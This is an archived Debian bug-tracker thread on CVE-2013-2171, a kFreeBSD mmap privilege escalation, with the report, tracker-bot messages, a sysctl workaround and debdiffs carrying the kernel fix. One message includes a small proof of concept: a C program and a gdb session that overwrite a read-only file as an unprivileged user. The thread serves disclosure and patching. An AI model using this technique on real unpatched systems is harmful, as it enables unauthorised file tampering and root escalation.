Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Steven Chamberlain ste...@pyro.eu.org writes: Please could you do an upload of SVN r4525 to unstable? I guess you mean 4523? or some special branch? Christoph -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
On 21/06/13 09:56, Christoph Egger wrote: Steven Chamberlain ste...@pyro.eu.org writes: Please could you do an upload of SVN r4525 to unstable? I guess you mean 4523? or some special branch? Actually yes I meant r4523, although the more recent commits didn't change anything in /trunk/kfreebsd-9. Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
A suggested workaround on vulnerable systems is: sysctl security.bsd.unprivileged_proc_debug=0 (which works by disabling some functionality of GDB to non-root users) Also the use of jails or securelevel could reduce the potential damage. Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: forwarded 712664 http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Set Bug forwarded-to-address to 'http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc'. clone 712664 -1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Bug 712664 cloned as bug 712892 reassign -1 src:kfreebsd-10 Bug #712892 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Bug reassigned from package 'src:kfreebsd-9' to 'src:kfreebsd-10'. No longer marked as found in versions kfreebsd-9/9.0-11 and kfreebsd-9/9.0~svn223109-0.1. Ignoring request to alter fixed versions of bug #712892 to the same values previously set retitle -1 kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Bug #712892 [src:kfreebsd-10] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Changed Bug title to 'kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap' from 'kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap' # not a real package version, but it or any later version will fix this fixed -1 kfreebsd-10/10.0~svn251901-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap The source kfreebsd-10 and version 10.0~svn251901-1 do not appear to match any binary packages Marked as fixed in versions kfreebsd-10/10.0~svn251901-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: found 712664 10.0~svn242489-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages Marked as found in versions kfreebsd-9/10.0~svn242489-1. found 712664 10.0~svn225709-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages Marked as found in versions kfreebsd-9/10.0~svn225709-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: # grrr notfound 712664 10.0~svn242489-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages No longer marked as found in versions kfreebsd-9/10.0~svn242489-1. notfound 712664 10.0~svn225709-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages No longer marked as found in versions kfreebsd-9/10.0~svn225709-1. found 712892 10.0~svn242489-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Marked as found in versions kfreebsd-10/10.0~svn242489-1. found 712892 10.0~svn225709-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Marked as found in versions kfreebsd-10/10.0~svn225709-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Christoph, Please could you do an upload of SVN r4525 to unstable? kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm now that the fix works too. Unfortunately the vulnerability is as simple and as serious as it sounds. A non-privileged user can overwrite any file having only read permissions. # cat /etc/foo steven:x:1000:1000:,,,:/home/steven:/bin/bash $ gdb testcase (gdb) run Program received signal SIGSEGV, Segmentation fault. 0x00400631 in main () at main.c:13 13 *ptr = 0; /* this will segfault */ (gdb) set {char}(ptr+9) = 0x30 (gdb) # cat /etc/foo steven:x::1000:,,,:/home/steven:/bin/bash Regards, -- Steven Chamberlain ste...@pyro.eu.org #include stdio.h #include errno.h #include unistd.h #include sys/mman.h int main() { FILE *fp = fopen(/etc/foo, r); int fd = fileno (fp); unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0); if (ptr = 0) return -1; *ptr = 0; /* this will segfault */ return 0; }
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Attached are proposed debdiffs for an upload to wheezy-security, based on the version currently in wheezy. The versioning scheme for the last security upload (with +deb70.$n) looks a bit weird to me (and it has lower value than the next changelog entry). So I also attach a second debdiff, proposing a different form. Please could someone with the necessary access, open a security.d.o RT ticket asking permission to upload whichever one of these, and for a DSA to be issued? Thanks! Regards, -- Steven Chamberlain ste...@pyro.eu.org diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100 @@ -1,3 +1,17 @@ +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high + + * Upload for wheezy-security + + -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100 + +kfreebsd-9 (9.0-12) unstable; urgency=high + + * Team upload. + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch --- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01 01:00:00.0 +0100 +++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19 20:49:15.0 +0100 @@ -0,0 +1,28 @@ +Description: + Fix a bug that allowed a tracing process (e.g. gdb) to write + to a memory-mapped file in the traced process's address space + even if neither the traced process nor the tracing process had + write access to that file. [13:06] + (CVE-2013-2171) +Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch +Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc +Bug-Debian: http://bugs.debian.org/712664 +Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902 + +Index: kfreebsd-9-9.0/sys/vm/vm_map.c +=== +--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 +0100 kfreebsd-9-9.0/sys/vm/vm_map.c 2013-06-18 13:39:13.104790989 +0100 +@@ -3704,6 +3704,12 @@ + vm_map_unlock_read(map); + return (KERN_PROTECTION_FAILURE); + } ++ if ((fault_typea VM_PROT_COPY) != 0 ++ (entry-max_protection VM_PROT_WRITE) == 0 ++ (entry-eflags MAP_ENTRY_COW) == 0) { ++ vm_map_unlock_read(map); ++ return (KERN_PROTECTION_FAILURE); ++ } + + /* +* If this page is not pageable, we have to get it for all possible diff -Nru kfreebsd-9-9.0/debian/patches/series kfreebsd-9-9.0/debian/patches/series --- kfreebsd-9-9.0/debian/patches/series2013-05-01 13:21:35.0 +0100 +++ kfreebsd-9-9.0/debian/patches/series2013-06-19 20:49:15.0 +0100 @@ -9,6 +9,7 @@ svn239447_SCTP_DoS.patch SA-12_08.linux.patch SA-13_05.nfsserver.patch +SA-13_06.mmap.patch # Other patches that might or might not be mergeable 001_misc.diff diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 21:12:56.0 +0100 @@ -1,3 +1,11 @@ +kfreebsd-9 (9.0-12~deb7u1) wheezy-security; urgency=high + + * Team upload. + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch --- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01 01:00:00.0 +0100 +++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19 20:49:15.0 +0100 @@ -0,0 +1,28 @@ +Description: + Fix a bug that allowed a tracing process (e.g. gdb) to write + to a memory-mapped file in the traced process's address space + even if neither the traced process nor the tracing process had + write access to that file. [13:06] + (CVE-2013-2171) +Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch +Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc +Bug-Debian: http://bugs.debian.org/712664 +Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902 + +Index: kfreebsd-9-9.0/sys/vm/vm_map.c +=== +--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 +0100
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Steven, Cc'ing team@security.d.o On Wed, Jun 19, 2013 at 09:23:49PM +0100, Steven Chamberlain wrote: Attached are proposed debdiffs for an upload to wheezy-security, based on the version currently in wheezy. Thanks Steven and Christoph for working on this issue. The versioning scheme for the last security upload (with +deb70.$n) looks a bit weird to me (and it has lower value than the next changelog entry). So I also attach a second debdiff, proposing a different form. Debdiff should be based on current wheezy(-security) version, so make the debdiff part for the changelog (i.e. without the unstable changelog part): diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100 @@ -1,3 +1,17 @@ +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high + + * Team upload. + * Upload for wheezy-security + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security [...] The versioning is indeed a bit ugly (preferred would have beeen also for the previous one +deb7uX, and incrementing X, there is a pending update for dev-ref describing this, see [1]). [1] http://bugs.debian.org/709218 Please could someone with the necessary access, open a security.d.o RT ticket asking permission to upload whichever one of these, and for a DSA to be issued? Small remark on this one: You also can do that in every case, no necessary permissions for RT are needed: write a mail to secur...@rt.debian.org with subject containing [Debian RT], see [2]. [2] http://wiki.debian.org/rt.debian.org#Security_Team Regards, Salvatore -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Source: kfreebsd-9 Version: 9.0-11 Severity: grave Tags: security upstream Control: found -1 kfreebsd-9/9.0~svn223109-0.1 Privilege escalation via mmap: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc This was introduced by r199819 when FreeBSD 9 was the SVN head. As such it affects 9.0 as well as 10.0 snapshots before today; I'm preparing a backport from 9-STABLE. -- System Information: Debian Release: wheezy/sid APT prefers testing APT policy: (500, 'testing'), (1, 'experimental') Architecture: kfreebsd-amd64 (x86_64) Kernel: kFreeBSD 9.0-2-amd64 Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages kfreebsd-image-9.0-2-amd64 depends on: ii devd 9.0+ds1-9 ii freebsd-utils 9.0+ds1-9 ii kbdcontrol 9.0+ds1-9 ii kldutils 9.0+ds1-9 kfreebsd-image-9.0-2-amd64 recommends no packages. kfreebsd-image-9.0-2-amd64 suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Control: tags -1 pending This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy). I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds. p.s. I didn't see any SVN commit mails from Alioth, I wonder if something there is broken... Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Processing control commands: tags -1 pending Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Added tag(s) pending. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi! Steven Chamberlain ste...@pyro.eu.org writes: This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy). I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds. I can probably install it on the 2 kfreebsd-amd64 production systems here for testing tomorrow if you want. Also, feel free to ping we wrt upload. Christoph -- 9FED 5C6C E206 B70A 5857 70CA 9655 22B9 D49A E731 Debian Developer | Lisp Hacker | CaCert Assurer -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org